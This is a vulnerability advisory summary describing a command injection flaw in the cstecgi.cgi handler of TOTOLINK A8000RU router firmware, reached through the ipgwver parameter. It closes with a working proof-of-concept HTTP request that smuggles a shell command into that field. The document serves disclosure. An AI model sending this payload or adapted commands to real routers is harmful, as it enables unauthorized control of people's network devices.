# Summary of Command Injection Vulnerability in A8000RU ## Vulnerability Overview * **Vulnerability Type**: Command Injection * **Affected Product**: TOTOLINK A8000RU * **Affected Version**: 7.1.cu.643_b20200521 * **Description**: A command injection vulnerability was identified in `cstecgi.cgi`. Attackers can execute arbitrary operating system commands by crafting requests that exploit the `ipgwver` parameter. * **Technical Details**: 1. In the `sub_4204B8` function, the program reads the user-supplied parameter `ipgwver`. 2. This value is passed to the `Uci_Set_Str` function. 3. Subsequently, the value of `ipgwver` is inserted into `v11` and formatted using `sprintf`. 4. Finally, the command is executed via `execv` within the `CsteSystem` function. ## Scope of Impact * **Vendor**: TOTOLINK * **Product**: A8000RU * **Version**: 7.1.cu.643_b20200521 ## Remediation * No specific remediation plan or patch information is provided on the page. ## Proof of Concept (PoC) **HTTP Request Example:** ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 69 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=1772465702.2 Connection: keep-alive {"topicurl":"setIptvCfg","ipgwver":"ls>./setIptvCfg.txt"} ```